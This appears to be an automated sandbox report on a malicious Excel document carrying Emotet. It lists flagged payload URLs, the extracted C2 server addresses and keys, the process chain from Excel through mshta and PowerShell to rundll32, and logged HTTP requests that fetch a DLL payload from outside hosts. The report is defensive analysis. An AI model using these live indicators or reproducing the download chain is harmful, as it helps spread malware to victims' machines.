                            Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3Avira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bAvira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/Avira URL Cloud: Label: malware
                            Source: http://kuyporn.com/wp-content/XSs5/Avira URL Cloud: Label: malware
                            Source: http://docs-construction.com/wp-admin/JJEf0kEA5/Avira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/2TjUH/Avira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlXtrPAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.pngPE3Avira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcDc927SJR/Avira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3Avira URL Cloud: Label: malware
                            Source: https://algzor.com/wp-includes/gAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlEtrMAvira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcDc927SJR/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlA(Avira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-content/FEj3y4z/Avira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/Avira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlO(Avira URL Cloud: Label: malware
                            Source: http://kuyporn.comAvira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/2TjUH/PE3Avira URL Cloud: Label: malware
                            Source: http://kuyporn.com/wp-content/XSs5/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlBAvira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-conAvira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.comAvira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/seAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.pngAvira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wpAvira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlC:Avira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3Avira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-incluAvira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168URL Reputation: Label: malware
                            Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3Avira URL Cloud: Label: malware
                            Source: https://algzor.com/wp-includes/ghFXVrGLEh/Avira URL Cloud: Label: malware
                            Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlmshtaAvira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3Avira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-adminAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 10.2.rundll32.exe.2130000.4.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                            Multi AV Scanner detection for submitted file
                            Source: 80_513972285.xlsReversingLabs: Detection: 33%
                            Multi AV Scanner detection for domain / URL
                            Source: kuyporn.comVirustotal: Detection: 9%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\QWER.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
                            Source: global trafficDNS query: name: kuyporn.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 74.207.230.120:8080
                            Source: Malware configuration extractorIPs: 139.196.72.155:8080
                            Source: Malware configuration extractorIPs: 37.44.244.177:8080
                            Source: Malware configuration extractorIPs: 37.59.209.141:8080
                            Source: Malware configuration extractorIPs: 116.124.128.206:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 54.37.228.122:443
                            Source: Malware configuration extractorIPs: 203.153.216.46:443
                            Source: Malware configuration extractorIPs: 168.197.250.14:80
                            Source: Malware configuration extractorIPs: 207.148.81.119:8080
                            Source: Malware configuration extractorIPs: 195.154.146.35:443
                            Source: Malware configuration extractorIPs: 78.46.73.125:443
                            Source: Malware configuration extractorIPs: 191.252.103.16:80
                            Source: Malware configuration extractorIPs: 210.57.209.142:8080
                            Source: Malware configuration extractorIPs: 185.168.130.138:443
                            Source: Malware configuration extractorIPs: 142.4.219.173:8080
                            Source: Malware configuration extractorIPs: 118.98.72.86:443
                            Source: Malware configuration extractorIPs: 78.47.204.80:443
                            Source: Malware configuration extractorIPs: 159.69.237.188:443
                            Source: Malware configuration extractorIPs: 190.90.233.66:443
                            Source: Malware configuration extractorIPs: 104.131.62.48:8080
                            Source: Malware configuration extractorIPs: 62.171.178.147:8080
                            Source: Malware configuration extractorIPs: 185.148.168.15:8080
                            Source: Malware configuration extractorIPs: 54.38.242.185:443
                            Source: Malware configuration extractorIPs: 198.199.98.78:8080
                            Source: Malware configuration extractorIPs: 194.9.172.107:8080
                            Source: Malware configuration extractorIPs: 85.214.67.203:8080
                            Source: Malware configuration extractorIPs: 66.42.57.149:443
                            Source: Malware configuration extractorIPs: 185.148.168.220:8080
                            Source: Malware configuration extractorIPs: 103.41.204.169:8080
                            Source: Malware configuration extractorIPs: 128.199.192.135:8080
                            Source: Malware configuration extractorIPs: 195.77.239.39:8080
                            Source: Malware configuration extractorIPs: 59.148.253.194:443
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:24:48 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:24:48 GMTContent-Disposition: attachment; filename="NsLUiuT.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f451108e964=1643401488; expires=Fri, 28-Jan-2022 20:25:48 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:24:48 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se
                            Source: mshta.exe, 00000004.00000002.436735526.00000000003C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414890461.0000000003572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.html
                            Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlA(
                            Source: 80_513972285.xls.0.drString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
                            Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
                            Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlEtrM
                            Source: mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlMuzL
                            Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlO(
                            Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
                            Source: mshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlXtrP
                            Source: mshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
                            Source: mshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
                            Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
                            Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.png
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
                            Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.c
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XS
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XSs5/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/Yc
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
                            Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.c
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/g
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-con
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-b
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-inclu
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/w
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
                            Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
                            Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: kuyporn.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
